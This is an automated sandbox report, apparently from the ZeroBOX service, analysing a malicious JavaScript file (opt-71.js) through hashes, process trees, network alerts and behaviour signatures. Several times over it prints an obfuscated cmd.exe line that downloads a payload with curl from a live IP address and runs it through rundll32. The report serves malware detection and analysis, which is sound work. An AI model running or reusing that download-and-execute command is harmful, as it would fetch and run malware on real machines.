Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

latestReport
01.18 10:01
setup641.msi
01.18 10:01
Needle_Setup.exe
01.18 10:01
8734_5737.exe
01.18 10:01
CondoGenerator.exe
01.18 10:01
QGFQTHIU.exe
01.18 10:01
4909_7122.exe
01.18 10:01
Updater.exe
01.17 05:01
beacon.exe
01.17 05:01
remcos_a2.exe
01.17 05:01
ogpayload.exe

Latest News
01.18 12:01
No Crystal Earpiece? N...
01.18 11:01
TikTok Says to ‘Go Dar...
01.18 10:01
‘Sneaky Log’ phishing ...
01.18 10:01
리튬코리아, 일본 스이린과 리튬 배터리 ...
01.18 10:01
Feds worry AT&T br...
01.18 10:01
AIs in Love, UEFI, For...
01.18 09:01
프롬한라, 제주 유정란 담은 반려견 간식...
01.18 09:01
무암(MooAm), 생성형 AI로 26종...
01.18 09:01
Trinteract Mini Space ...
01.18 09:01
IT Sicherheitsnews tae...

Summary | ZeroBOX

opt-71.js

AntiVM AntiDebug

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 17, 2023, 10:35 a.m.	Oct. 17, 2023, 10:37 a.m.

Size	413.4KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`a5de8594f885a3ba4d8fdad1c9122c33`
SHA256	`b8cf2d47dc1b5932f414ef3e66ca1890c0bd9371b4aaa5034c4210dfaba92e19`
CRC32	`AD426A35`
ssdeep	`6144:yj38P9IwPaHP79bvi5u9r9pMrSwx+0KTxfdchsTHMZOdxEDFAdeCG:YclKTfjoOdxECdep`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\opt-71.js
2552
- cmd.exe "C:\Windows\System32\cmd.exe" /c ttk || ecHO ttk & piNg ttk || CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk || rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs
  2700
  - PING.EXE piNg ttk
    2800
  - curl.exe CuRl http://89.147.111.46/gWUA/Enven -o C:\Users\test22\AppData\Local\Temp\ttk.log
    2860
  - PING.EXE piNg -n 2 ttk
    2912
  - rundll32.exe rundLl32 C:\Users\test22\AppData\Local\Temp\ttk.log scab /k haval462
    2984

Name	Response	Post-Analysis Lookup
www.ssl.com	A 54.236.82.84 A 54.174.96.153	54.236.82.84

IP Address	Status	Action
164.124.101.2	Active	Moloch
54.174.96.153	Active	Moloch
89.147.111.46	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49167 -> 89.147.111.46:80	2013028	ET POLICY curl User-Agent Outbound	Attempted Information Leak
TCP 192.168.56.101:49167 -> 89.147.111.46:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Oct. 17, 2023, 10:35 a.m.	buffer: 'ttk' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1	0
WriteConsoleW Oct. 17, 2023, 10:35 a.m.	buffer: ttk console_handle: 0x00000007	1	1	0
WriteConsoleA Oct. 17, 2023, 10:35 a.m.	buffer: Ping request could not find host ttk. Please check the name and try again. console_handle: 0x00000007	1	1	0
WriteConsoleA Oct. 17, 2023, 10:35 a.m.	buffer: Ping request could not find host ttk. Please check the name and try again. console_handle: 0x00000007	1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://89.147.111.46/gWUA/Enven

Performs some HTTP requests (2 events)

request	GET http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt
request	GET http://89.147.111.46/gWUA/Enven

Creates a suspicious process (2 events)

cmdline	cmd.exe /c ttk \|\| ecHO ttk & piNg ttk \|\| CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk \|\| rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs
cmdline	"C:\Windows\System32\cmd.exe" /c ttk \|\| ecHO ttk & piNg ttk \|\| CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk \|\| rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Oct. 17, 2023, 10:35 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c ttk \|\| ecHO ttk & piNg ttk \|\| CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk \|\| rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs filepath: cmd.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 17, 2023, 10:35 a.m.	flags: 15 family: 0		111	0

Yara rule detected in process memory (9 events)

description	(no description)				rule	DebuggerCheck__GlobalFlags
description	(no description)				rule	DebuggerCheck__QueryInfo
description	(no description)				rule	DebuggerHiding__Thread
description	(no description)				rule	DebuggerHiding__Active
description	(no description)				rule	DebuggerException__SetConsoleCtrl
description	(no description)				rule	ThreadControl__Context
description	(no description)				rule	SEH__vectored
description	Checks if being debugged				rule	anti_dbg
description	Bypass DEP				rule	disable_dep

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	piNg -n 2 ttk
cmdline	cmd.exe /c ttk \|\| ecHO ttk & piNg ttk \|\| CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk \|\| rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs
cmdline	"C:\Windows\System32\cmd.exe" /c ttk \|\| ecHO ttk & piNg ttk \|\| CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk \|\| rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs
cmdline	piNg ttk

Communicates with host for which no DNS query was performed (1 event)

host

89.147.111.46

Wscript.exe initiated network communications indicative of a script based payload download (1 event)

Time & API	Arguments	Status	Return	Repeated
WSASend Oct. 17, 2023, 10:35 a.m.	buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com socket: 960		0	0

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
WSASend Oct. 17, 2023, 10:35 a.m.	buffer: GET /repository/SSLcomRootCertificationAuthorityRSA.crt HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: www.ssl.com socket: 960		0	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c ttk \|\| ecHO ttk & piNg ttk \|\| CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk \|\| rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs
parent_process	wscript.exe				martian_process	cmd.exe /c ttk \|\| ecHO ttk & piNg ttk \|\| CuRl http://89.147.111.46/gWUA/Enven -o %TmP%\ttk.log & piNg -n 2 ttk \|\| rundLl32 %TMp%\ttk.log scab /k haval462 & ExiT EAfLoHcktGDs

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2552 resumed a thread in remote process 2700
NtResumeThread Oct. 17, 2023, 10:35 a.m.	thread_handle: 0x000004e8 suspend_count: 1 process_identifier: 2700	1	0	0

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\cmd.exe